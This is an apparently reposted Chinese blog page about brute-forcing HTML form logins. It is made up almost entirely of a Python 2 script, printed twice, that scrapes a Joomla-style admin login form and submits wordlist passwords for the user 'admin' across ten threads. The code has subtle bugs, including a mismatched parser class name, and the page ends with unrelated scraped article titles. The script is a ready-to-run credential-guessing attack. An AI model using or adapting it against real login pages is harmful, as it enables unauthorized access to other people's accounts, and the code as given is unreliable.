暴力破解HTML表格认证
来源:互联网 发布:美剧推荐知乎 编辑:程序博客网 时间:2024/06/05 10:09
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
user_thread= 10
username = "admin"
wordlist_file = '../wingware/DirBuster/directory-list-2.3-small.txt'
resume = None
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field = "username"
password_field = "passwd"
success_check="Administration - Control Panel"
class Bruter(object):
def __init__(self,username,words):
self.username=username
self.password_q= words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page=response.read()
print "Trying : %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
parser=BruteParser()
parser.feed(page)
post_tags = parser.tag_results
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
login_response =opener.open(target_post,login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit ..."
class BruterParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results={}
def handle_starttag(self,tag,attrs):
if tag=="input":
tag_name=None
tag_value = None
for name,value in attrs:
if name=="name":
tag_name=value
if name =="value":
tag_value=value
if tag_name is not None:
self.tag_results[tag_name] = value
def build_wordlist(wordlist_file):
fd = open(wordlist_file,"rb")
raw_words=fd.readlines()
fd.close()
found_resume=False
words = Queue.Queue()
for word in raw_words:
word=word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
words = build_wordlist(wordlist_file)
bruter_obj =Bruter(username, words)
bruter_obj.run_bruteforce()
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
user_thread= 10
username = "admin"
wordlist_file = '../wingware/DirBuster/directory-list-2.3-small.txt'
resume = None
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
username_field = "username"
password_field = "passwd"
success_check="Administration - Control Panel"
class Bruter(object):
def __init__(self,username,words):
self.username=username
self.password_q= words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page=response.read()
print "Trying : %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
parser=BruteParser()
parser.feed(page)
post_tags = parser.tag_results
post_tags[username_field] = self.username
post_tags[password_field] = brute
login_data = urllib.urlencode(post_tags)
login_response =opener.open(target_post,login_data)
login_result = login_response.read()
if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit ..."
class BruterParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results={}
def handle_starttag(self,tag,attrs):
if tag=="input":
tag_name=None
tag_value = None
for name,value in attrs:
if name=="name":
tag_name=value
if name =="value":
tag_value=value
if tag_name is not None:
self.tag_results[tag_name] = value
def build_wordlist(wordlist_file):
fd = open(wordlist_file,"rb")
raw_words=fd.readlines()
fd.close()
found_resume=False
words = Queue.Queue()
for word in raw_words:
word=word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
words = build_wordlist(wordlist_file)
bruter_obj =Bruter(username, words)
bruter_obj.run_bruteforce()
0 0
- 暴力破解HTML表格认证
- 服务认证暴力破解工具Crowbar
- EAP-MD5认证暴力破解工具eapmd5pass
- 暴力破解
- 暴力破解
- 暴力破解
- 防止SSH暴力破解
- 暴力破解ImageToPDF.exe
- 3389多线程暴力破解
- 3389多线程暴力破解
- 关于暴力破解 ---hydra
- hydra 暴力破解工具
- 关于暴力破解
- 暴力破解password算法
- 括号序列暴力破解
- MFC之暴力破解
- 暴力破解工具-Hydra
- 暴力破解zip
- linux下mysql的root密码忘记解决方
- nginx 操作
- 基于mtk平台调试FM发射芯片KT0805
- Android调用摄像头
- linux释放内存
- 暴力破解HTML表格认证
- 利用反正切函数展开计算∏的近似值
- EditText中Hint文本样式设置
- css3
- oracle创建表
- Spring+quartz实现集群任务调度
- iOS企业级证书开发的程序是否能发布到Appstore?
- JAVA_内部类和代码块
- opencv+QT 读取一张图片
